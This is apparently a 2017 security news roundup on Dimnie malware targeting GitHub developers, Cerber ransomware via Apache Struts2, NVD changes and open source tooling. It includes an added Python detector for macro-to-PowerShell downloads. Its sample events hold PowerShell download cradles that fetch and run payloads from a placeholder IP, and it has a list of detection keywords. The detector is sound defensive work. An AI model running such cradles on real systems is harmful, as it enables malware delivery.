NIST redesigned the National Vulnerability Database with a much-needed, modernized look-and-feel — including a scrolling list of the latest scored vulnerabilities and a “visualization” section designed to provide different ways to look at the data. First impression? While some kinks still need to be worked out (the site loads very slowly), it’s going to be much easier to find vulnerability and mitigation information in the NVD than in the past.
March 2017 closed out with 1347 entries, slightly higher than the average 1100 vulnerabilities usually reported per month. In other open source security and cybersecurity news: Attackers have targeted developers on GitHub with an information-stealing program called Dimnie. Researchers have noticed new mutations in the attacks targeting the Apache Struts2 vulnerability. Google has put much of its open source in one easy-to-find place. Learn how to safeguard the software you develop from the start with these Jenkins plug-ins. Five ways to keep open source-based apps secure. Pain and confusion with open source licenses. And the top four software development methodologies.
Open Source Developers Targeted in Sophisticated Malware Attack
For the past few months, developers who publish their code on GitHub have been targeted in an attack campaign that uses a little-known but potent cyberespionage malware, reports PCWorld. Emails crafted to attract the attention of developers carried .gz attachments containing Word documents with malicious macro code embedded. If the recipient enabled macros, the macro ran a PowerShell script that reached out to a remote server and downloaded a malware program known as Dimnie.
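The chain described above (an Office document whose macro launches PowerShell, which then fetches a payload from a remote host) leaves a recognizable trace in endpoint process-creation telemetry: an Office application as the parent, a script host as the child, and a download cradle in the command line. The following added example, which is not code from the original article or from the researchers it cites, scores constructed Sysmon-style process-creation records on exactly that pattern and also decodes PowerShell's -EncodedCommand argument, since macro droppers commonly hide the cradle behind it. All event data, process names and the 203.0.113.5 address are constructed for illustration.

```python
import base64
import re

# Parent processes that should rarely spawn a script host, and the script hosts themselves.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Strings that indicate the script reaches out to the network to fetch something.
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod"
    r"|net\.webclient|start-bitstransfer|https?://)",
    re.IGNORECASE,
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; \b stops -exec etc. from matching.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict):
    """Score one process-creation event.

    Returns "high" for Office -> script host -> network download, "medium" for
    Office -> script host with no visible download, and None otherwise.
    """
    parent, image = basename(event["parent"]), basename(event["image"])
    if parent not in OFFICE_PARENTS or image not in SCRIPT_HOSTS:
        return None
    decoded = decode_encoded_command(event["cmdline"])
    effective = decoded if decoded is not None else event["cmdline"]
    return "high" if DOWNLOAD_CRADLE.search(effective) else "medium"


def scan(events):
    """Return (pid, severity) for every event that matches the Office-to-script-host pattern."""
    hits = []
    for event in events:
        severity = classify(event)
        if severity is not None:
            hits.append((event["pid"], severity))
    return hits


# Constructed sample events modelled on Sysmon Event ID 1 (process create) fields.
HIDDEN_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2')"
SAMPLE_EVENTS = [
    {"pid": 1000, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" C:\Users\dev\Downloads\project_spec.docx'},
    {"pid": 1001, "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c (New-Object Net.WebClient)"
                ".DownloadFile('http://203.0.113.5/a.exe','C:\\Users\\dev\\AppData\\Local\\Temp\\a.exe')"},
    {"pid": 1002, "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(HIDDEN_CRADLE)},
    {"pid": 1003, "parent": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo build ok"},
    {"pid": 1004, "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest http://203.0.113.5/update.ps1"},
]

if __name__ == "__main__":
    for pid, severity in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {severity}")
```

The parent-child relationship is the load-bearing signal; the cradle keywords only raise the severity, so an encoded or obfuscated command line from an Office parent is still reported rather than silently dropped. Event 1004 shows the trade-off: a download from a non-Office parent is ignored here and needs a separate rule.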
Cerber for Servers: Apache Struts2 Campaign Targets Servers with Ransomware
via SC Magazine UK: F5 Networks' researchers watched a campaign targeting the Apache Struts2 vulnerability pivot on 20 March and start delivering Cerber ransomware to servers. Cerber encrypts its victims' files and demands payment in bitcoin to decrypt them and restore access. It is apparently popular on Russian underground forums, and Malwarebytes called it “pretty powerful ransomware written with attention to detail,” noting its “rich customization options and various tricks to make analysis harder.”
Google Presents its Open Source Goodies to the World
via ZDNet: In a blog post, Will Norris, a software engineer at Google's Open Source Programs Office, wrote: "Free and open-source software has been part of our technical and organizational foundation since Google's early beginnings. From servers running the Linux kernel to an internal culture of being able to patch any other team's code, open source is part of everything we do. In return, we've released millions of lines of open-source code, run programs like Google Summer of Code and Google Code-in, and sponsor open-source projects and communities through organizations like Software Freedom Conservancy, the Apache Software Foundation, and many others."
And now, 18 years after Google was founded, Google has launched opensource.google.com. This site "ties together all of our initiatives with information on how we use, release, and support open source."
Jenkins Users Can Shore Up Software Security with Plugins
In an in-depth InfoWorld article, Fahmida Rashid looks at how you can safeguard the software you develop from the start with Jenkins plugins and integrations that automate security testing as part of the build. For example, the Black Duck Hub plugin for Jenkins identifies known vulnerabilities in open source components, enforces open source security policies, flags license issues, and detects modified open source components.
5 Ways to Keep Open Source Based Apps Secure
Open source is used in numerous applications in all industries by organizations of all sizes. The reasons are straightforward: Using open source lowers development costs, speeds time to market, and accelerates innovation. More than 80 percent of all cyberattacks specifically target applications. The combination of these two facts—applications are the #1 target of cyberattacks and open source is the foundation of most of today’s application code—leads to the inevitable conclusion that open-source vulnerabilities are one of the biggest risks to application security.
Black Duck vice president of security strategy, Mike Pittenger, shares tips and best practices you can take now to manage open-source risks in TechBeacon.
Pain and Confusion with Open Source Licenses
“[Kyle] rates a list of popular licenses along two dimensions: Pain - how inconvenient they are to use; and Confusion - uncertainty in the meaning of their terms. He also includes some concise ‘Key Points’ about each. And, conveniently, he provided a link to the text of each license in the SPDX License List. (Kyle is an active contributor to the SPDX Legal Team.) The framework provides an interesting way to think about licenses and as input to developing an open source use policy or selecting a license for a project.”
Top 4 Software Development Methodologies
To manage a project efficiently, the manager or dev team must choose the software development method that works best for the project at hand. Each of the many software development methodologies exists for a reason. Black Duck intern Tyler Hubbell has done some research into why different methodologies exist and which are the most commonly used.